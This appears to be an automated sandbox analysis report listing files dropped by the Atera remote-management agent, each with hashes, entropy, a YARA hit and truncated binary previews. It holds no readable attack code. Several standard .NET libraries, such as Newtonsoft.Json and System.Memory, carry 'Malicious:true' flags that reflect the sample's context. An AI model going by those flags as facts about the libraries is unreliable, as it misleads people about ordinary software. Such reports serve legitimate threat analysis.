                                                                                                                                                                                                                                        SHA-256:C3A249955F2BC7809B96917A3BB5A69BB5F7A54FABC023EB9DB764CA5B7B9C5C
                                                                                                                                                                                                                                        SHA-512:991D82B4A1FF9570BCDD9C912CBCAFF8C80A94826707B2BFD8915AB3F732A6152834CF936F4D518A1D6CBA484FB48523F61536CC409B1F28F08FEB7C3C4D28C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ....................................@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.855499793771738
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:S1c5HLPirxWW4/wyNyb8E9VF6IYijSJIVxkAM:S1cpmPNSEpYi60E
                                                                                                                                                                                                                                        MD5:0060823775F16743AECCEB6DE4DBB8AD
                                                                                                                                                                                                                                        SHA1:3266F6FBE2E91777B51A3A40A523B5448BE5EFE5
                                                                                                                                                                                                                                        SHA-256:6188C16B6641C3D418537020382E562AC39F7B2C6599B6326EC3F9F05EF227B0
                                                                                                                                                                                                                                        SHA-512:44ECBD43A229B2554875182B7853634BE35E93F76DF3299C5539B366BBA0C2D07E3EE87634C97000C7B78C7E5451BF2D1D58E52F54F60CB7AFB047781C2B2FEE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.Zg.........."...0..............-... ...@....@.. ..............................].....`..................................,..O....@..................((...`.......+............................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........!..$............................................................0../.......................(....}......(....&(.....{....Y*..0..D.......................(....}......(....-.(.......(....s....z(.....{....Yn*..(....*.0..t.......r...pr...p...s......o.... ....(.....s......o....&s......(....vl(....o......o.....!..(....&..(....o....&.o......&...*......S..o........7..R.!....BSJB............v4.0.30319......l...T...#~..........#Strings....\...4...#US.........#GUID...........#Blo

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1017
                                                                                                                                                                                                                                        Entropy (8bit):5.00184675687532
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdArdEtPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3Ar+z7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                        MD5:8A743B2BAC31EB00D4BDA0EBC8DF160B
                                                                                                                                                                                                                                        SHA1:5564F6A8F02973D040E8409E21B2A18ECA2CA8EB
                                                                                                                                                                                                                                        SHA-256:31A69A6D9423CE1BCF98F5281DEB1B8F537D95609CDFA03AF9A41CBF00D1243A
                                                                                                                                                                                                                                        SHA-512:9F14C687EF076CEB4B903E2C5803DCB9401BDEADC00B0E090765E67B54E9BEEC733B087609D76C605C8485C7E446E8DB3A0D8AA3E17C969FC155F069070BB543
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398888
                                                                                                                                                                                                                                        Entropy (8bit):6.13428787028244
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:RjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvH:R+e55LgIkTmyAAfTnMLvH
                                                                                                                                                                                                                                        MD5:A3008D478A57AC234CDC253BBC7F9F60
                                                                                                                                                                                                                                        SHA1:528437D2568842658F68E92E9B27117AD4015037
                                                                                                                                                                                                                                        SHA-256:70F2CB79D3FAEFF43AFD9128D67C568FF7167C997263B7CDD13EA994DA6ED1B5
                                                                                                                                                                                                                                        SHA-512:F971495CC1469273EDB055718BEA8B8EDE6EA04214E938BE987B662E0CCDEDFBA47173593414B171351079D2DDA11C245D9042E32918A3A23949770C5FA948EC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`.......4....`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710184
                                                                                                                                                                                                                                        Entropy (8bit):5.96056332961101
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:sBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUj:sBjk38WuBcAbwoA/BkjSHXP36RMGe
                                                                                                                                                                                                                                        MD5:1EA58D26DCD24816959E6B35F7BF747A
                                                                                                                                                                                                                                        SHA1:BCB4A937F206E68F4AD107E936807AAE056475BB
                                                                                                                                                                                                                                        SHA-256:2B41CB318A275CAF053ECD8A8024C6C96E1A61FB729327097938A66A222070B7
                                                                                                                                                                                                                                        SHA-512:45001B1D9FC2284BAD9DE450FD73716F882C2F7D1098FE5C8F65290147936FC57BF65CF2CE1CA404FD7125ACD2815DA196A26E097D252837C302A68572E69C3A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......&.....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18472
                                                                                                                                                                                                                                        Entropy (8bit):6.706389759512927
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Tq+stMuQM22tDNyb8E9VF6IYijSJIVxcyOI:TIMud2efEpYi60H
                                                                                                                                                                                                                                        MD5:D09D334B74989996A2955324B2B69CCF
                                                                                                                                                                                                                                        SHA1:2803A10FDC2D98E730AFA2660AA84B0F0B34F210
                                                                                                                                                                                                                                        SHA-256:96D3ED6E532DBE0759667416F92F6EFD53DB4CB681B41A1F61E1AA5D827BB43B
                                                                                                                                                                                                                                        SHA-512:C5700E8FBB525B248848B633E82920784DD0061B4789E35AD303F3017055DE42AC03188F09D1FA151CD1A3E291FA12E6BB0EFC2D947D65385E438DF64606151A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.Zg.........."...0..............4... ...@....@.. ..............................A.....`.................................d4..O....@............... ..((...`......,3............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H.......(#..............................................................6.(.....(....*...0..........s....%r...po......o......&..*....................0..%.......r!..p.s.......o.......,..o.......&..*.......................!!.......0..........r_..p(......i...r...p(....*....r...p....s.....r_..p(.....o.... ....(.....s........(....-.........o.....o.....o....(.......l&..-.s....%.o....%r...po.......L....(....o....&..&...o....,%.o....( ...-..o....(!...,..o....(".....,..o.....*....4..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):975
                                                                                                                                                                                                                                        Entropy (8bit):5.005145470654642
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsHPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3st7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                        MD5:DB02B24A7803C99F651940FECBE6E283
                                                                                                                                                                                                                                        SHA1:34EF3032B61E369535658D72BCE1E9908888EA0A
                                                                                                                                                                                                                                        SHA-256:207C4D442FACD06379217DD915D85D926DD622E72F6DB5814753FD2E5F8D0048
                                                                                                                                                                                                                                        SHA-512:9C76B6E3DBB34E2729F5C0E49A2A195C87AE11916A4479676AD09EE2C182DD83F87E826BA39DDF410B99A82EF1053571AA7A1E97426D396794C6E25E066C3849
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22056
                                                                                                                                                                                                                                        Entropy (8bit):6.673416104268275
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3y/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqGvg:3uhMaVmzDC6k0EpYi60wg
                                                                                                                                                                                                                                        MD5:CA1C428ADB5872777EC6A105C7D1EFF9
                                                                                                                                                                                                                                        SHA1:6C6F3452E2699E9EEA3D3F300766668359917EC9
                                                                                                                                                                                                                                        SHA-256:F08F707F9CEA7ADB4D43573533CE2CD357AC04616B47FA6D4A1A81F2EABAED6D
                                                                                                                                                                                                                                        SHA-512:4BE96D58EB63B867C99B60CC29026A5D7BD0BFBF7FAC869C6C4C5348554568B3B88448A648782481C96C303B4471941D8F597F3DFE13BE9EC63C08951117FE1E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............((...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64040
                                                                                                                                                                                                                                        Entropy (8bit):6.266761914470489
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:iYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zRL:iKC9niwOepJ6TJPeb6NIUFg76Kz1
                                                                                                                                                                                                                                        MD5:182E1E00BDB7B16C66169A6A9342CDBD
                                                                                                                                                                                                                                        SHA1:5B25935680A57926640092EB2CB7838EE2C86F9A
                                                                                                                                                                                                                                        SHA-256:BEBE376EA2274F3723F93562A47F977EA036A719E54A35511EA7E9521F8C9E36
                                                                                                                                                                                                                                        SHA-512:95569350BA7E0EC54C067CC262C2F8E8017C9CFD1E663F0681E802FB1D4EE590CF6BA36DA8E9CE31CD5E0FB919CD3101D4F17E021D6BF25B045FE03592F91F80
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@............`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138280
                                                                                                                                                                                                                                        Entropy (8bit):6.178858736123087
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:3P3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJH9:3h0qjC5RMOHO420kN1W
                                                                                                                                                                                                                                        MD5:E28122AB74176E6CE6FDA6E237615B9B
                                                                                                                                                                                                                                        SHA1:36B00A7D5C91873AB0FA555DF7384498108FFF1F
                                                                                                                                                                                                                                        SHA-256:030F115AD1F8298B7F599B7399A29FB86786D99EC98F3DC33A7767DD69E0FDC6
                                                                                                                                                                                                                                        SHA-512:F054440D510DA500B42C63E4872D001DF6C3E86EE317EC8981E1B077474F9A22A13C507F1827F8F7C23A28A0EBD28CAB007DC21F415540C31DE46EDE210FDCD2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......na....@.................................3...O.... ..0...............((...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17960
                                                                                                                                                                                                                                        Entropy (8bit):6.633344050480558
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:WTO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF082cu:WCn6xYEpYi60k8e
                                                                                                                                                                                                                                        MD5:BEA66EB1DF29AD0860D6394CFCBF7DBC
                                                                                                                                                                                                                                        SHA1:23173D6A2BD055CCEFA3F7845478D58EFFC0B915
                                                                                                                                                                                                                                        SHA-256:D56B6020C47CE10B4030E533442CEC7DB713F19DF407F4CC8D5860AB108B7A1E
                                                                                                                                                                                                                                        SHA-512:1B8800F05729AE46AA80E1BF804AB9DA964D8B881724EC82BBB2188FF186B7E8C8891F02BB4C2DC956C1A4AC443EEBAC513AE37A604C4451BC6D8F7205417DBF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^...........!.................1... ...@....@.. ....................................@..................................1..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H........#......................P ......................................O..q.<.P$[p.;a<...Ci......K..!..&.d...FaLJ.....f..........w.E.E........(y...,.Lr..R..........T.z....5..;.. ....&V.=}.... .0.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0................*..0...............*...0...............*...0..........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27176
                                                                                                                                                                                                                                        Entropy (8bit):6.33278245676455
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:An1VM0JrpNWDcIh6leOiDFIFBYp1+yWEpYi604L:AnvXYcIh6yFIFBYpcyX76z
                                                                                                                                                                                                                                        MD5:48A2F08D9B23752C60694F6362229FEA
                                                                                                                                                                                                                                        SHA1:06AB43F0C7365676D8AA46444E9CC10351B73ED5
                                                                                                                                                                                                                                        SHA-256:16FFC7E3B4B0425EB0D9676871E068B862A5F46A235842D0669F2942B366271D
                                                                                                                                                                                                                                        SHA-512:08404FE1EBD554AAE3086A2B3E1D5D9B9F1E1E61A0E24133F4BE3EB4F134AB920B1A0AFD6967772C8FDA6D959DF8A4C030F1E68A930944ADB82D912B146CFEA1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..((..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3264797
                                                                                                                                                                                                                                        Entropy (8bit):7.999874275656608
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:98304:wmlKzCGP3O8ZafZGor7w2Xtapa8vte3kntR0+:DnGRZafZ2ja8JnXz
                                                                                                                                                                                                                                        MD5:FF671B6085BA35E1BBEBD5D2389AB7D6
                                                                                                                                                                                                                                        SHA1:D7719A66E303C4E854FABA873B781E0084F36998
                                                                                                                                                                                                                                        SHA-256:4F2A43098F6EFF50A03FDE9E134A4C8B7DF6FE7E9A9C6913AFEEFE0DEEB1463E
                                                                                                                                                                                                                                        SHA-512:F5A63EEB6A239D7BE9935CEB1240AAE7C9F3A8D5740D665B5FDE6F28A7667FEB345F88BC440EBE7D6A0512B448F4E3772A49823BC6AD8BA7372E0A31B5F9F200
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....`mzY.W........../...AgentPackageTicketing/AgentPackageTicketing.exe....(........H........@.e....R.l....bkS.b.o.&.....7.o.....6.5|..>..B.8.+C8..*c....j0.....f)....El._..w......l.....E.R.......L....,..|.}.?.1.5z.!.......<m.~SB....G.&.....e..?..sS.E...+.^..".t....r..bPD.G.........".Na.-oN$lg>...[..u...6......R...x..C...u...Y.}.........w-|I....I}..R.\!.A`..Bw.4..(\...f38.I\g.=..Ud)..9..r5...+.p..N.T..H..O:..{8w....d.T.M...;%*..........:.Lm.rh&.j&.F...]..h..u}..&.a.#ev..5......}O.?;..xQ....\....wd...x.)...m.Wc-%..aN..%.M.-..B..4S*.....v......{.].+^{.*_..E...\I.xR...Cv.s=F.....y.g.}iE..r.X...R8..b.1.H%....f{.M....%G;?..G........... ,f.."BH...[...9....@..b.....6..8.....f...XL.K./oi.WM.OJ..e...".]] 24B..n.}..E..6~....~6....g.-........f.&T.zZ...%......^.x...Aw.0...R5-p..I9.J~.^].gj......Ok.....hP..X.c..../.o#.Fz.*..Y../.j.!....-... ...QZ....R......%e.....y...+./*^.i&."HM.v>..(......rzf..v'4...G..n..m...a.>..\..jsM...F`...X.=txRV.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33320
                                                                                                                                                                                                                                        Entropy (8bit):6.271212916167532
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:w2G6bukIMKWcoIQEIhL4lylU9vfWtkfoi75yHiDMMXpO64REVmiRWNyb8E9VF6Ic:VLKF6EIR4lXdIEDLmeVmiR+EpYi60Lb+
                                                                                                                                                                                                                                        MD5:DB1DB66EBD9B15B7DCD55374EA56EE5E
                                                                                                                                                                                                                                        SHA1:C22897EB20900A66CF62023C37D6A7D1192AEC3D
                                                                                                                                                                                                                                        SHA-256:0263A627BBEA55A66DEECD7A43F8537BB68B5F95BB3D4269D3E594BD1D851E64
                                                                                                                                                                                                                                        SHA-512:B56B2143A60E6153E7FB752029C72D78547D5253F32ECBD0DDA5A8ACC5C3859292E860162B11A041A37B4F618F4425484B4E2385D7E2C621C8CBCED073E3A67E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg.........."...0..N..........~l... ........@.. ....................................`.................................,l..O.......4............Z..((...........j............................................... ............... ..H............text....L... ...N.................. ..`.rsrc...4............P..............@..@.reloc...............X..............@..B................`l......H.......@4...6...........................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o......s....%.o........o......s...........s....%......io....%o......o........o....o......(....*..0..........r...p... .....r...p.(.....o......(.....o.......(...........s......[o......s....%.o........o .......s!..........s.......i.......%......io".......o....o....(.........o#...*..($...*...0..~.......~....r-..po%...(.....(&.

